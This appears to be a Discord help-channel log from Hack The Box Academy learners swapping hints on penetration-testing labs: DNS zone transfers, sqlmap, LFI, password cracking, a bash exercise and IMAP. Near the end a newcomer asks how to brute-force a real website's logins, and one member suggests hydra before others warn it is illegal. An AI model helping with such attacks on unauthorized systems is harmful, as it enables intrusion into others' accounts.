dig AXFR @ns2.inlanefreight.htb inlanefreight.htb ;; Connection to 10.129.119.33#53(10.129.119.33) for inlanefreight.htb failed: timed out. ;; Connection to 10.129.119.33#53(10.129.119.33) for inlanefreight.htb failed: timed out. ;; Connection to 10.129.119.33#53(10.129.119.33) for inlanefreight.htb failed: timed out.

same with ns{1,2,...}.inlanefreight.htb

it can't work like that.
Who should resolve ns2.inlanefreight.htb?

I actually don't know

and to be honest, i don't know the meaning of resolve in the context of DNS

https://www.cloudflare.com/learning/dns/what-is-dns/

What does a DNS do?

Is the question then :)

Presumably

need help on sqlmap assessment. Found **.php I can exploit it but i cannot retrieve database names with sqlmap

one sec

okay

can you send the section of the module

which section?

which module ?

are talking about ?

Im doing the sqlmap assessment

Sqlmap essentials?

yeah sorry

there is SQLMap Essentials & SQL Injection Fundamentals , which module ?

sqlmap essentials

ok. which section ?

skills assessment

Attack Tuning or Database Enumeration or what ?

ok

The skill assessment portion

The last one

Ive found the ac***.php but i cant retrieve the database name

the machine crash all time

trying to crack the password

Are you trying to brute force the ssh?

@everyone

Nice try

In the Attacking Common Applications module, LDAP section, I have tried everything I can think of plus more, with both the login form page, ldapsearch from terminal and with Burp repeater. Can someone help me out with figuring out how to do this LDAP injection? Thanks!

NVM... just got it....🤦‍♂️

Why how come when i run hashcat once i get the standard verbose output, and correct string for hash. But when i clear screen and try the EXACT same command again it i get a different output and a message that says "INFO: All hashes found as potfile and/or empty entries! Use --show to display them." Its not a big deal i guess i can run the command with --show but i like the output. Rn im just closing the terminal and opening a new one everytime.

ftp

It's to save time, would you rather wait 10 minutes each time or have it saved and be able to just grab it with --show

Interesting iirc you can do threads up to 48 and it perform just fine. But by the machine stops working/crashing you mean it just stops responding entirely, no scan or anything gives anything back?

Can someone help me with the Attacking Common Services Module - Hard Lab ? I am stuck on the last question. I got creds for fi*** but I don't know where to go now. Tried mssql but I don't seem to get into that. Can someone give me a hint or something?

Hello, I'm currently trying to do the final Skills Assessment in the File Inclusion module but I'm stuck and I feel like I'm close to finishing.

I was able to get the source code which I've since reviewed. From the source code I made my way to ilf_admin/index.php. At this point, I can use LFI to open /etc/passwd. I'm looking for a flag somewhere in /. I've tried every RCE method taught in the module (except for those that require uploading a file, since I haven't found any upload options) but none have worked.

I tried fuzzing the web server to look for config files (HTTP headers tell me it's an nginx server running PHP 7.3) and I did find /etc/nginx/nginx.conf, though it showed me little. Except that it has a line 'include /etc/nginx/*.conf' but since I don't know what those conf files are, I can't get more info from there. I've tried a few different wordlists to fuzz for php.ini, but haven't found it either.

At this point, I have a suspicion that I need to achieve RCE somehow, and ls the root folder in order to expose the flag I'm looking for. I haven't had any luck getting RCE to work, and I'm looking for some pointers/hints/advice/etc thank you ❤️

hi I am working on the conditional execution for the BASH module. I'm getting this:

#!/bin/bash
#count the number of characters in a variable
#echo $variable | wc -c

#Variable to encode
$var="nef892na9s1p9asn2aJs71nIsm"

for counter in {1..40}
do
  $var=$(echo var | base64)
if [$counter -eq 35]
  then
    echo $var{counter:34:1}
 fi
done

but it still isn't working

can someone please give me a hint?

You need spaces before and after [ ]. https://www.shellcheck.net/ is really useful for correcting your syntax

dm if you're still working on it

I corrected that but it says the value assigned to var was "not found" and that 1..40 is an "illegal number"

You're using $var when declaring the variable. You only need $ when you want to access the contents of a variable you already declared.

As for the counter is an illegal number try echo ${var:34:1}

so like this:

var="nef892na9s1p9asn2aJs71nIsm"

for counter in {1..40}
do
  $var = $(echo $var | base64)
  if [ $counter -eq 35 ]
    then
      echo $var{$var:34:1}
  fi

that's fewer errors but still not working. Its saying the value for var is "not found" and its still an illegal number

var=$(echo $var | base64)
echo ${var:34:1}

Hey guys. I’m at password attacks skill assessments hard lab. Trying with much effort to crack Johanna ‘s password with no success. Tried the original and mutated password file with crackmapexec. Am I on the lead? Maybe try again?

you mean instead of the for loop?

No, just replace those lines

then get rid of if-statement?

can anyone help me with the footprinting module's dns section last question

im not able to find the given ip address to look for

fqdn

?

hold on wait

is this closer?

var="nef892na9s1pasn2aJs71nIsm"

for counter in {1..40}
do
  if [ $counter -eq 35 ]
    then
      echo ${var:34:1}
  fi
done

only thing is illegal number is still there?

that code won't work

ok so what am I doing wrong here?

thanks by the way

I really appreciate the help?

echo ${var:34:1}```
The way you are calling the output of the variable will print the 35th character on the 35th sequence, e.g. counter

You need to count the number of characters of the generated variable in the 35th sequence

right ok

what about

echo ${var:0:1}

Change the approach, you don't need to count only one character, but all the characters on sequence 35

so like this:

echo ${var::}

I see what you want to do, but simplify it

Write it as you are writing it in a shell

echo $var

Let's assume the variable var=hello, how would you print it out and count the words in it

echo $var | wc -c

something like that?

😉

what about illegal number?

its saying {1..40} is illegal number

it sounds like that's the only thing left

if you haven't edited much the initial code, then the addition that you have made to it won't break it

@autumn pilot can you help me with the footprinting module - dns section thank u for your time

doesn't seem like I have notes for that section

You need to find all zones

Host 203, right?

yes

i not able to get this one only

i even ran the dnsenum

Have you found all the zones? Remember that not all zones allow a zone transfer from everyone.

ohk

let me check one more time

https://www.cloudflare.com/learning/dns/glossary/dns-zone/

I don't get what I am doing wrong at this point anymore

the shebang is there at the beginning I just didn't want to retype it

and pwnbox doesn't allow for copying into local machine obviously

there is a dedicated copy-paste box

ok

so ya that's my actual code

thanks I noticed the dedicated copy-paste box

lmao

hi why was my code deleted? the code still doesn't work

it works, but the question is why it gives a different result in pwnbox/workstation

it says illegal number

Hey guys. I’m at password attacks skill assessments hard lab. Trying with much effort to crack Johanna ‘s password with no success. Tried the original and mutated password file with crackmapexec. Am I on the lead? Maybe try again?

i ran it on my local machine I'm still getting illegal number

what would you do at this point?

try with double "["

can i dm you

you mean around 1..40?

still is giving me illegal number

lmao

additionally you are missing the following line - var=$(echo $var | base64)

noob question ihaving issues with reverse shell can some point me in the right direction

I added that code but illegal number is still there

sorry about pasting code force of habit

Take a screenshot of the cmd output

what is this codes

(for waht)

have you tried with bash?

dude he is apple

(nvm)

I mean if my code isn't working on my local machine or in pwnbox and your saying it works I don't get it

even with the corrections

bash <file>.sh

or make it executable and ./<file>.sh

I got it ok

I got it it worked

thanks

flag submitted

np

Hey, could someone help me with AD Enumeration & Attacks - Skills Assessment Part II?

I think the issue is that in your reverse shell you put bin/sh instead of /bin/sh - there needs to be a slash (/) before the bin

thanks didnt notice the typo i hate when its as simple as that

Haha yeah it happens a lot

Just having another pair of eyes can help

thanks

Do you know of a way without using evolution and only command line? I am stuck on the same problem now - I’ve opened the email, I can see all the content but I see no flag

I got the flag now as well using evolution - I wonder why it doesn’t show in CLI

1 Fetch 1 body[]

Give me a minute and I'll send the website I found that had the commanda

https://www.atmail.com/blog/imap-commands/

1 fetch <num> body and 1 fetch <num> body[] are two separate commands that yield different results :)

I take it you were getting stuff such as "NIL NIL NIL"

Anyone can help me with this? I read somewhere about retired machines. Is this one of them?

retired machines only refer to the main app.hackthebox.com it would be kinda silly if the modules that you pay for would be retired wouldn't it?

Could it be that rdp uses udp or tcp and the vpn only supports tcp maybe

idk

VPN can use either

It's not exclusive

Though it can be a tad of a pain, you can try swapping your config for the other one

Sometimes that does help

Ok I'll try that

Anyone who can help me at password attacks skill assessments hard lab??

Not quite, I just saw only the flags and stuff, the sender, the person it’s to, etc but I didn’t see the flag

But yeah I saw atmail when I looked it up but i was on my school@network so ofc they block the educational material 😭

how do i run a password generator on a website

i have the code

wdym ?

but i wanna attach it to the website

like test passwords

until true

you can use hydra for that I guess

how do u guys get kali linux

is it on hack the box?

Hack the Box has a pwnbox instance which runs Parrot OS

its similar to Kali

is it free?

I think once a day or so you can use it yes

and can it run hydra?

via command line.

https://manpages.org/hydra

But as it seems you don't know a lot about such tools. So be careful and do not just use it on random sites because that would probably be against the law

Or you install your own Parrot OS on a VM

Personally I would recommend it, only when you PC / Laptop had the capability to support virtualization

i cant boot linux from a usb

and its laggy

i jus wanna use parrot os on windows

Then you are probably doing something wrong. Because if you PC can run Win it sure can run linux

I don’t know your PC specs… but if you want to make it into cyber security, investing in your pc isn’t a mad investment if you ask me 🙂 but that’s all personally

You can try using VMware or Virtual Box

takes too long tbh

im not i just need to do sum

A decent laptop is also totally fine. Like I got mine for 200€ and it works like a charm for all the stuff I need it. (Maybe not password cracking)

Virtual box is free 🙂 only 4 GN of RAM + storage needed Preferable SSD

where do i run the hydra code?

@high current https://www.youtube.com/watch?v=l97dVIKlmVg

Aw okay, also password cracking related to HTB isn’t a big thing. Mostly you only need rockyou.. and if it’s not cracking in a few mins.. that that isn’t the way

THC hydra you mean?

Yeah. Thats true, but I meant real world haha

does password cracking take longer on parrot os

?

yea the password cracker

All depends on CPU/GPU

no. The cracking depends on your hardware

ok i have a 4090

so im good

Dangggggg

That’s very good

Bro flexing

That I would use Hashcat😂

Not JTR

true

i just got it 3 weeks ago

for my birthday

but I mean they want to do network stuff

whats that

But yeah the IMAP command 1 fetch 1 body[] will give it to you

I have a 3060🥲 but I don’t game so yea I don’t really care about a good GPU

Me chilling with a shitty GPU xD

Password cracker 🙂 google it, it’s a amazing tool

1070 gang

Well I have 32 GB of ram.. (me flexing)😂

1070 maybe 4 gig allocated

1050 Ti Gang 😂

Hahahaha 😂

is
ophcrack good?

it runs on windows

I've never used it

Also yes, personally I don’t use it much.

Generally hashcat is the standard or John the Ripper

Hashcat is my way to go, it has so many features 🙂

If hashcat is being feral I give it to the Ripper

What do you want to do exactly ?

And he's a gentleman giving me the answer

Hashcat is so often hating me xD. Like its insane how often it just crashes or so on me haha. But I love it. Like a real cat

getting a password through a website with no firewall

Then probably hydra because it can do HTTP stuff

yo how do i get the websites hash?

oh, that's very useful information, but 1 question, i perhaps missed it. Is rockyou built-in file in kali?

yea but hydra cant run on windows

This conversation is straying off-topic

I don’t use Kali… so idk. But I think so yes

Website hash?!

i see, thank you

Reminder this channel is for conversation and help with the modules

NOT general web hacking (which is illegal)

#hacker-lounge to have not related conversations about the modules 🙂

You can ask in #1024429874246590575 or verify following #rules and #welcome and have access to other channels

im testing

I think its not. Just found out. It is

for educational purposes

im not actually hacking

Google it… to be sure 🙂

Do you have permission to test the vulnerable site

yes

Currently on it. Conflicting results xD

its my freinds

he needs help testing it

Then he should get an actual professional/more experienced person to test it

Hahahah, then start up Kali 😆 type : find / -name rockyou.txt 2>/dev/null

Hell first step is the vulnerability assessment

Which is documenting vulnerable plugins/pages/etc.

yea, me too)

Ok found out its default in kali. Its in /usr/share/wordlists/rockyou.txt.gz

Unzip it😆 gunzip <file>

fun times haha

I would check out the http://academy.hackthebox.com/ fundamental courses so you can get an idea of what you're actually getting yourself into

I also have a question, why do we need to destroy the error output, why is it useful or is it just for subjective convenience?

Because it will try to search through stuff you don't have permission (mostly) and throw a lot of errors

Well, it will redirect the errors (the unwanted messages, in my opinion), like messages “permission denied”

@magic solstice

ahh, got it, thank you a lot

It's highly recommended to use a virtual machine as well @high current

i have a kali linux iso file

on my usb

how do i boot it

.

Download VMware or VirtualBox and use the premade Kali download from the Offsec site... It will be a lot easier to get set up that way

https://www.kali.org/docs/usb/live-usb-install-with-windows/

i already downloaded kali

its on my F drive

i wanna have a usb so i can just unplug it when im done using kali

Read the stuff that was send.

k

imma go into my bios hold up

Also again this channel is intended to discuss academy modules not explaining people how to hack

It's better off doing it in a vm

Oh alright - ill write that down in my notes

Instead of on your main system

Because if you fuck up and brick your system, you're fucked

And considering, respectfully, you're a noob

I wonder if we will ever see them again 😂

Reduce the risks

im done

the iso file didnt run

in bios

I always shy away of using the term noob. I think it sounds bad. I would go for inexperienced.

Eh

I call it as I see it

fair enough

TBH you should probably make yourself an account on hackthebox, verify it so you can take this to another channel